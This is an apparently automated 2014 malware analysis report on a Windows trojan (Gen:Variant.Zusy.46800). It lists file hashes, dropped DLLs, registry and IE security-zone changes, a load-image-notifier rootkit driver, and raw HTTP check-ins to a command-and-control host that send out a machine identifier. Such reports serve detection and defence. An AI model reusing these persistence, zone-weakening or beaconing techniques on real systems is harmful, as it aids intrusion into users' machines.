Gen.Variant.Zusy.46800_4f1aed7bbb

by malwarelabrobot on December 17th, 2014 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Zusy.46800 (B) (Emsisoft), Gen:Variant.Zusy.46800 (AdAware), GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

MD5: 4f1aed7bbbe43e65cf416fdedb00ecff
SHA1: b9e73c7f73e697932bc7cd2fa2eff0f133da39f9
SHA256: b7ab11bcccb084b0fd3fea86713fe576efe9d8e0e2e36ac266e0491aa48b0b33
SSDeep: 6144:FRkVBq2ypZBpupPAcYrV3eyZuU2i1mB1kCrN:HCBq2GXpuOt3eGrrY1
Size: 228352 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: AirInstaller
Created at: 2013-03-15 12:36:24
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

regsvr32.exe:816
%original file name%.exe:320

The Trojan injects its code into the following process(es):

svchost.exe:1152

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:320 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\ (4 bytes)
%System%\drivers\3a2ba1fa.sys (71 bytes)
%WinDir%\WinSxS (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Coor.bat (112 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\giynhrYsD.dll (90 bytes)
%System%\wshtcpip.dll (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\index.dat (400 bytes)
%WinDir%\AppPatch (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B1.zip (19 bytes)
%System%\config\SOFTWARE.LOG (11686 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A1.zip (19 bytes)
%WinDir%\REGISTRATION (4 bytes)
%WinDir% (492 bytes)
C:\$Directory (2360 bytes)
%System%\wshtcptk.dll (19 bytes)
%System% (4664 bytes)
%System%\midimap.dll (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dyeky.dll (90 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\C1.zip (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ZHHNK1RJ\desktop.ini (67 bytes)
%System%\drivers\4680947c.sys (32 bytes)
%WinDir%\WinSxS\Policies\x86_Policy.6.0.Microsoft.Windows.Common-Controls_6595b64144ccf1df_x-ww_5ddad775 (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WHUF81E3\desktop.ini (67 bytes)
%System%\wbem (1064 bytes)
%System%\drivers (32 bytes)
%Documents and Settings%\All Users\Start Menu (4 bytes)
%System%\config\software (4303 bytes)
%System%\kakutk.dll (294 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G1U3S5Y7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\index.dat (16 bytes)
%System%\wbem\Repository\FS\INDEX.BTR (4624 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KQHFGPHV\desktop.ini (67 bytes)
%System%\wbem\Repository\FS\OBJECTS.DATA (10986 bytes)

The Trojan deletes the following file(s):

%System%\drivers\4680947c.sys (0 bytes)

Registry activity

The process regsvr32.exe:816 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\CLSID\{AB705622-B25B-491B-A6BF-4A46FDDBC88E}\VersionIndependentProgID]
"(Default)" = "IEHlprObj.IEHlprObj"

[HKCR\TypeLib\{AB705628-B25B-491B-A6BF-4A46FDDBC88E}\1.0\0\win32]
"(Default)" = "%System%\kakutk.dll"

[HKCR\Interface\{AB705621-B25B-491B-A6BF-4A46FDDBC88E}\TypeLib]
"(Default)" = "{AB705628-B25B-491B-A6BF-4A46FDDBC88E}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCR\TypeLib\{AB705628-B25B-491B-A6BF-4A46FDDBC88E}\1.0]
"(Default)" = "IEHelper 1.0 Type Library"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCR\IEHlprObj.IEHlprObj\CurVer]
"(Default)" = "IEHlprObj.IEHlprObj.1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCR\Interface\{AB705621-B25B-491B-A6BF-4A46FDDBC88E}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{AB705621-B25B-491B-A6BF-4A46FDDBC88E}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\TypeLib\{AB705628-B25B-491B-A6BF-4A46FDDBC88E}\1.0\FLAGS]
"(Default)" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCR\IEHlprObj.IEHlprObj.1]
"(Default)" = "IEHlprObj Class"

[HKCR\Interface\{AB705621-B25B-491B-A6BF-4A46FDDBC88E}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCR\CLSID\{AB705622-B25B-491B-A6BF-4A46FDDBC88E}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Interface\{AB705621-B25B-491B-A6BF-4A46FDDBC88E}]
"(Default)" = "IIEHlprObj"

[HKCR\IEHlprObj.IEHlprObj]
"(Default)" = "IEHlprObj Class"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCR\IEHlprObj.IEHlprObj.1\CLSID]
"(Default)" = "{AB705622-B25B-491B-A6BF-4A46FDDBC88E}"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "15 98 20 1B 1E E7 D1 34 F6 7E C6 18 68 C2 9A 84"

[HKCR\CLSID\{AB705622-B25B-491B-A6BF-4A46FDDBC88E}]
"(Default)" = "IEHlprObj Class"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCR\CLSID\{AB705622-B25B-491B-A6BF-4A46FDDBC88E}\InprocServer32]
"(Default)" = "%System%\kakutk.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCR\CLSID\{AB705622-B25B-491B-A6BF-4A46FDDBC88E}\ProgID]
"(Default)" = "IEHlprObj.IEHlprObj.1"

[HKCR\TypeLib\{AB705628-B25B-491B-A6BF-4A46FDDBC88E}\1.0\HELPDIR]
"(Default)" = "%System%\"

The process %original file name%.exe:320 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\CLSID\HOOK_ID]
"Name" = "%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "49 20 93 85 03 9A 75 75 8A E3 0B E7 DE DC D1 D5"

[HKCR\CLSID\SYS_DLL]
"Name" = "giynhrYsD.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%System%\jdiguuwBsh, \??\%System%\jdiguuwBsh"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
90affacb3c4f110ba63df2be93f2e41a c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\A1.zip
0b14dfd82a538cf8933435397dbc4925 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\B1.zip
743cac2a53ba132d086853141246d7d7 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\C1.zip
5c12660a97822f6e61576943b49aaad6 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\H7Ui28hui
a581a82cb3267abb7543946ada12bcfa c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\dyeky.dll
1f08a122535451e44926934069f39d2a c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\giynhrYsD.dll
883ef2dd3c9f68691ce02daac7267d41 c:\Program Files\Java\jre6\bin\swe5i
fd60844f7dc0cf7c7afa70b7ec6d0a7e c:\Program Files\Java\jre6\lib\deploy\jqs\ie\7PhfhwYk
565caee4622770caac3aa1213d6738cc c:\WINDOWS\system32\drivers\3a2ba1fa.sys
4e3d06d6e68eedb52565080f55b460d3 c:\WINDOWS\system32\jdiguuwBsh
28d9e9a9f8184972ce262a4d9fad6aac c:\WINDOWS\system32\kakutk.dll
4e3d06d6e68eedb52565080f55b460d3 c:\WINDOWS\system32\wshtcptk.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "%System%\drivers\3a2ba1fa.sys", the Trojan controls the loading of executable images into memory by installing the Load image notifier.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 806912 1536 0 033faf6d9fca77f29d3529b55e7abba8
.data 811008 204800 201216 5.53196 4a79f1b149a5041886eaece7dd20e9be
.rsrc 1015808 8192 6144 0.378005 0445acc62bc38f6c01f643cc6b44dfe6
.reloc 1024000 4096 1536 0.065844 c158ec72e8b1f3d2ed53aff4d702d457
.idata 1028096 20480 16896 3.2386 31347d4c9120a884a1f55d165cb539f2

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://198.105.210.188/get.asp?mac=D51B80D0FFCCD68BB0C633ADD668FF39&os=winxp Professional&avs=unknow&ps=NO.&ver=jack
hxxp://educaresurvivorship.com/get.asp?mac=D51B80D0FFCCD68BB0C633ADD668FF39&os=winxp Professional&avs=unknow&ps=NO.&ver=jack
hxxp://www.educaresurvivorship.com/get.asp?mac=D51B80D0FFCCD68BB0C633ADD668FF39&os=winxp Professional&avs=unknow&ps=NO.&ver=jack 198.105.210.188


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET USER_AGENTS Suspicious user agent (Google page)
ET TROJAN Win32/Comisproc Checkin
ET TROJAN Murlo Trojan Checkin

Traffic

GET /get.asp?mac=D51B80D0FFCCD68BB0C633ADD668FF39&os=winxp Professional&avs=unknow&ps=NO.&ver=jack HTTP/1.1
User-Agent: Google page
Connection: Keep-Alive
Cache-Control: no-cache
Host: VVV.educaresurvivorship.com


HTTP/1.1 404 Not Found
Date: Tue, 16 Dec 2014 05:40:31 GMT
Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
X-Powered-By: PHP/5.4.25
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug

<<< skipped >>>

GET /get.asp?mac=D51B80D0FFCCD68BB0C633ADD668FF39&os=winxp Professional&avs=unknow&ps=NO.&ver=jack HTTP/1.1
User-Agent: Google page
Host: 198.105.210.188
Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily
Date: Tue, 16 Dec 2014 05:40:30 GMT
Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
X-Powered-By: PHP/5.4.25
Location: hXXp://VVV.educaresurvivorship.com/get.asp?mac=D51B80D0FFCCD68BB0C633ADD668FF39&os=winxp Professional&avs=unknow&ps=NO.&ver=jack
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


The Trojan connects to the servers at the following location(s):
